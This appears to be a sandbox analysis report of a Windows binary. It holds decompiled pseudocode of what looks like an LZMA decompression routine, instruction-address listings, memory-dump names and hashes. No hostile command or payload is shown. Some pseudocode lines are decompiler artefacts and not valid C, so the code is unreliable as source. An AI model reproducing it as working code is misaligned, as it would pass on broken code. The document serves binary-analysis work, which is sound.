												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                0x00000000
                                                                                0x004065da
                                                                                0x004065da
                                                                                0x004065de
                                                                                0x00406603
                                                                                0x0040660d
                                                                                0x00000000
                                                                                0x004065e0
                                                                                0x004065e0
                                                                                0x004065e3
                                                                                0x004065e7
                                                                                0x004065ea
                                                                                0x004065ed
                                                                                0x004065f1
                                                                                0x004065f1
                                                                                0x004065f4
                                                                                0x004066ce
                                                                                0x004066ce
                                                                                0x004066d5
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x0040670c
                                                                                0x00406710
                                                                                0x00406770
                                                                                0x00406773
                                                                                0x00406778
                                                                                0x00406779
                                                                                0x0040677b
                                                                                0x0040677d
                                                                                0x00406780
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x00000000
                                                                                0x00405e42
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e4b
                                                                                0x00405e4e
                                                                                0x00405e51
                                                                                0x00405e55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e5b
                                                                                0x00405e5e
                                                                                0x00405e60
                                                                                0x00405e61
                                                                                0x00405e64
                                                                                0x00405e66
                                                                                0x00405e67
                                                                                0x00405e69
                                                                                0x00405e6c
                                                                                0x00405e71
                                                                                0x00405e76
                                                                                0x00405e7f
                                                                                0x00405e92
                                                                                0x00405e95
                                                                                0x00405ea1
                                                                                0x00405ec9
                                                                                0x00405ecb
                                                                                0x00405ed9
                                                                                0x00405ed9
                                                                                0x00405edd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ecd
                                                                                0x00405ed0
                                                                                0x00405ed1
                                                                                0x00405ed1
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ea7
                                                                                0x00405eac
                                                                                0x00405eac
                                                                                0x00405eb5
                                                                                0x00405ebd
                                                                                0x00405ec0
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ee3
                                                                                0x00405ee3
                                                                                0x00405ee7
                                                                                0x00406793
                                                                                0x00000000
                                                                                0x00406793
                                                                                0x00405ef0
                                                                                0x00405f00
                                                                                0x00405f03
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f09
                                                                                0x00405f0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f0f
                                                                                0x00405f15
                                                                                0x00405f3f
                                                                                0x00405f45
                                                                                0x00405f4c
                                                                                0x00000000
                                                                                0x00405f4c
                                                                                0x00405f1b
                                                                                0x00405f1e
                                                                                0x00405f23
                                                                                0x00405f23
                                                                                0x00405f2e
                                                                                0x00405f36
                                                                                0x00405f39
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f7e
                                                                                0x00405f84
                                                                                0x00405f87
                                                                                0x00405f94
                                                                                0x00405f9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f53
                                                                                0x00405f53
                                                                                0x00405f57
                                                                                0x004067a2
                                                                                0x00000000
                                                                                0x004067a2
                                                                                0x00405f63
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f71
                                                                                0x00405f74
                                                                                0x00405f77
                                                                                0x00405f7c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406613
                                                                                0x00406613
                                                                                0x00406619
                                                                                0x0040661f
                                                                                0x00406625
                                                                                0x0040663f
                                                                                0x00406642
                                                                                0x00406648
                                                                                0x00406653
                                                                                0x00406653
                                                                                0x00406655
                                                                                0x00406627
                                                                                0x00406627
                                                                                0x00406636
                                                                                0x0040663a
                                                                                0x0040663a
                                                                                0x0040665f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406661
                                                                                0x00406665
                                                                                0x00406814
                                                                                0x00000000
                                                                                0x00406814
                                                                                0x00406671
                                                                                0x00406678
                                                                                0x00406680
                                                                                0x00406683
                                                                                0x00406686
                                                                                0x00406686
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405fa4
                                                                                0x00405fa6
                                                                                0x00405fa9
                                                                                0x0040601a
                                                                                0x0040601d
                                                                                0x00406020
                                                                                0x00406027
                                                                                0x00406031
                                                                                0x00000000
                                                                                0x00406031
                                                                                0x00405fab
                                                                                0x00405faf
                                                                                0x00405fb2
                                                                                0x00405fb4
                                                                                0x00405fb7
                                                                                0x00405fba
                                                                                0x00405fbc
                                                                                0x00405fbf
                                                                                0x00405fc1
                                                                                0x00405fc6
                                                                                0x00405fc9
                                                                                0x00405fcc
                                                                                0x00405fd0
                                                                                0x00405fd7
                                                                                0x00405fda
                                                                                0x00405fe1
                                                                                0x00405fe5
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405ff1
                                                                                0x00405ff4
                                                                                0x00406012
                                                                                0x00406014
                                                                                0x00000000
                                                                                0x00405ff6
                                                                                0x00405ff6
                                                                                0x00405ff9
                                                                                0x00405ffc
                                                                                0x00405fff
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406004
                                                                                0x00406007
                                                                                0x00406009
                                                                                0x0040600a
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x00406243
                                                                                0x00406247
                                                                                0x00406265
                                                                                0x00406268
                                                                                0x0040626f
                                                                                0x00406272
                                                                                0x00406275
                                                                                0x00406278
                                                                                0x0040627b
                                                                                0x0040627e
                                                                                0x00406280
                                                                                0x00406287
                                                                                0x00406288
                                                                                0x0040628a
                                                                                0x0040628d
                                                                                0x00406290
                                                                                0x00406293
                                                                                0x00406293
                                                                                0x00406298
                                                                                0x00000000
                                                                                0x00406298
                                                                                0x00406249
                                                                                0x0040624c
                                                                                0x0040624f
                                                                                0x00406259
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062ad
                                                                                0x004062b1
                                                                                0x004062d4
                                                                                0x004062d7
                                                                                0x004062da
                                                                                0x004062e4
                                                                                0x004062b3
                                                                                0x004062b3
                                                                                0x004062b6
                                                                                0x004062b9
                                                                                0x004062bc
                                                                                0x004062c9
                                                                                0x004062cc
                                                                                0x004062cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062f0
                                                                                0x004062f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062fa
                                                                                0x004062fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406304
                                                                                0x00406306
                                                                                0x0040630a
                                                                                0x0040630a
                                                                                0x0040630d
                                                                                0x00406311
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406361
                                                                                0x00406365
                                                                                0x0040636c
                                                                                0x0040636f
                                                                                0x00406372
                                                                                0x0040637c
                                                                                0x00000000
                                                                                0x0040637c
                                                                                0x00406367
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406388
                                                                                0x0040638c
                                                                                0x00406393
                                                                                0x00406396
                                                                                0x00406399
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040639c
                                                                                0x0040639f
                                                                                0x004063a2
                                                                                0x004063a2
                                                                                0x004063a5
                                                                                0x004063a8
                                                                                0x004063ab
                                                                                0x004063ab
                                                                                0x004063ae
                                                                                0x004063b5
                                                                                0x004063ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406448
                                                                                0x00406448
                                                                                0x0040644c
                                                                                0x004067ea
                                                                                0x00000000
                                                                                0x004067ea
                                                                                0x00406452
                                                                                0x00406455
                                                                                0x00406458
                                                                                0x0040645c
                                                                                0x0040645f
                                                                                0x00406465
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x0040646a
                                                                                0x0040646d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040603d
                                                                                0x0040603d
                                                                                0x00406041
                                                                                0x004067ae
                                                                                0x00000000
                                                                                0x004067ae
                                                                                0x00406047
                                                                                0x0040604a
                                                                                0x0040604d
                                                                                0x00406051
                                                                                0x00406054
                                                                                0x0040605a
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605f
                                                                                0x00406062
                                                                                0x00406062
                                                                                0x00406065
                                                                                0x00406068
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040606e
                                                                                0x00406074
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040607a
                                                                                0x0040607a
                                                                                0x0040607e
                                                                                0x00406081
                                                                                0x00406084
                                                                                0x00406087
                                                                                0x0040608a
                                                                                0x0040608b
                                                                                0x0040608e
                                                                                0x00406090
                                                                                0x00406096
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x0040609f
                                                                                0x004060a2
                                                                                0x004060a5
                                                                                0x004060a8
                                                                                0x004060c4
                                                                                0x004060c7
                                                                                0x004060ca
                                                                                0x004060cd
                                                                                0x004060d4
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060de
                                                                                0x004060aa
                                                                                0x004060aa
                                                                                0x004060ae
                                                                                0x004060b6
                                                                                0x004060bb
                                                                                0x004060bd
                                                                                0x004060bf
                                                                                0x004060bf
                                                                                0x004060e1
                                                                                0x004060e8
                                                                                0x004060eb
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f6
                                                                                0x004060f6
                                                                                0x004060fa
                                                                                0x004067ba
                                                                                0x00000000
                                                                                0x004067ba
                                                                                0x00406100
                                                                                0x00406103
                                                                                0x00406106
                                                                                0x0040610a
                                                                                0x0040610d
                                                                                0x00406113
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x00406121
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406123
                                                                                0x00406126
                                                                                0x00406129
                                                                                0x0040612c
                                                                                0x0040612f
                                                                                0x00406132
                                                                                0x00406135
                                                                                0x00406138
                                                                                0x0040613b
                                                                                0x0040613e
                                                                                0x00406141
                                                                                0x00406159
                                                                                0x0040615c
                                                                                0x0040615f
                                                                                0x00406162
                                                                                0x00406162
                                                                                0x00406165
                                                                                0x00406169
                                                                                0x0040616b
                                                                                0x00406143
                                                                                0x00406143
                                                                                0x0040614b
                                                                                0x00406150
                                                                                0x00406152
                                                                                0x00406154
                                                                                0x00406154
                                                                                0x0040616e
                                                                                0x00406175
                                                                                0x00406178
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406178
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004061ba
                                                                                0x004061ba
                                                                                0x004061be
                                                                                0x004067c6
                                                                                0x00000000
                                                                                0x004067c6
                                                                                0x004061c4
                                                                                0x004061c7
                                                                                0x004061ca
                                                                                0x004061ce
                                                                                0x004061d1
                                                                                0x004061d7
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061dc
                                                                                0x004061df
                                                                                0x004061df
                                                                                0x004061e5
                                                                                0x00406183
                                                                                0x00406183
                                                                                0x00406186
                                                                                0x00000000
                                                                                0x00406186
                                                                                0x004061e7
                                                                                0x004061e7
                                                                                0x004061ea
                                                                                0x004061ed
                                                                                0x004061f0
                                                                                0x004061f3
                                                                                0x004061f6
                                                                                0x004061f9
                                                                                0x004061fc
                                                                                0x004061ff
                                                                                0x00406202
                                                                                0x00406205
                                                                                0x0040621d
                                                                                0x00406220
                                                                                0x00406223
                                                                                0x00406226
                                                                                0x00406226
                                                                                0x00406229
                                                                                0x0040622d
                                                                                0x0040622f
                                                                                0x00406207
                                                                                0x00406207
                                                                                0x0040620f
                                                                                0x00406214
                                                                                0x00406216
                                                                                0x00406218
                                                                                0x00406218
                                                                                0x00406232
                                                                                0x00406239
                                                                                0x0040623c
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x004064cb
                                                                                0x004064cb
                                                                                0x004064cf
                                                                                0x004067f6
                                                                                0x00000000
                                                                                0x004067f6
                                                                                0x004064d5
                                                                                0x004064d8
                                                                                0x004064db
                                                                                0x004064df
                                                                                0x004064e2
                                                                                0x004064e8
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040629b
                                                                                0x0040629b
                                                                                0x0040629e
                                                                                0x00406610
                                                                                0x00406610
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406697
                                                                                0x0040669b
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066c0
                                                                                0x004066c7
                                                                                0x00000000
                                                                                0x004066c7
                                                                                0x0040669d
                                                                                0x004066a0
                                                                                0x004066a3
                                                                                0x004066a6
                                                                                0x004066ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406788
                                                                                0x0040678b
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063c2
                                                                                0x004063c4
                                                                                0x004063cb
                                                                                0x004063cc
                                                                                0x004063ce
                                                                                0x004063d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004063d9
                                                                                0x004063dc
                                                                                0x004063df
                                                                                0x004063e1
                                                                                0x004063e3
                                                                                0x004063e3
                                                                                0x004063e4
                                                                                0x004063e7
                                                                                0x004063ee
                                                                                0x004063f1
                                                                                0x004063ff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066e4
                                                                                0x004066e4
                                                                                0x004066e8
                                                                                0x00406820
                                                                                0x00000000
                                                                                0x00406820
                                                                                0x004066ee
                                                                                0x004066f1
                                                                                0x004066f4
                                                                                0x004066f8
                                                                                0x004066fb
                                                                                0x00406701
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406706
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406407
                                                                                0x0040640a
                                                                                0x00406440
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406573
                                                                                0x00406573
                                                                                0x00406576
                                                                                0x00406578
                                                                                0x00406802
                                                                                0x00000000
                                                                                0x00406802
                                                                                0x0040657e
                                                                                0x00406581
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406587
                                                                                0x0040658b
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x00000000
                                                                                0x0040658e
                                                                                0x0040640c
                                                                                0x0040640e
                                                                                0x00406410
                                                                                0x00406412
                                                                                0x00406415
                                                                                0x00406416
                                                                                0x00406418
                                                                                0x0040641a
                                                                                0x0040641d
                                                                                0x00406420
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x0040682a
                                                                                0x00406830
                                                                                0x00406832
                                                                                0x00406839
                                                                                0x0040683b
                                                                                0x00406842
                                                                                0x00406846
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000
                                                                                0x0040683f
                                                                                0x0040668c
                                                                                0x00406712
                                                                                0x00406718
                                                                                0x0040671b
                                                                                0x0040671e
                                                                                0x00406721
                                                                                0x00406724
                                                                                0x00406727
                                                                                0x0040672a
                                                                                0x0040672d
                                                                                0x00406733
                                                                                0x0040674c
                                                                                0x0040674f
                                                                                0x00406752
                                                                                0x00406755
                                                                                0x00406759
                                                                                0x0040675b
                                                                                0x0040675c
                                                                                0x0040675f
                                                                                0x00406735
                                                                                0x00406735
                                                                                0x0040673d
                                                                                0x00406742
                                                                                0x00406744
                                                                                0x00406747
                                                                                0x00406747
                                                                                0x00406769
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00406769
                                                                                0x00000000
                                                                                0x004065de

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 753a0416312aa9da6239a5d8e8bd4fc9594da22da3bae0b4040a62fa8d08d67a
                                                                                • Instruction ID: 5a4154bb6154f426c482196efbe52c2b0f00cec2a6ed5240ece5146aa127bfa5
                                                                                • Opcode Fuzzy Hash: 753a0416312aa9da6239a5d8e8bd4fc9594da22da3bae0b4040a62fa8d08d67a
                                                                                • Instruction Fuzzy Hash: 2F913271D00229CBDF28CF98C8547AEBBB1FF44305F15856AD856BB281C7789A86DF84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004062F0, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E004062F0() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406847))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
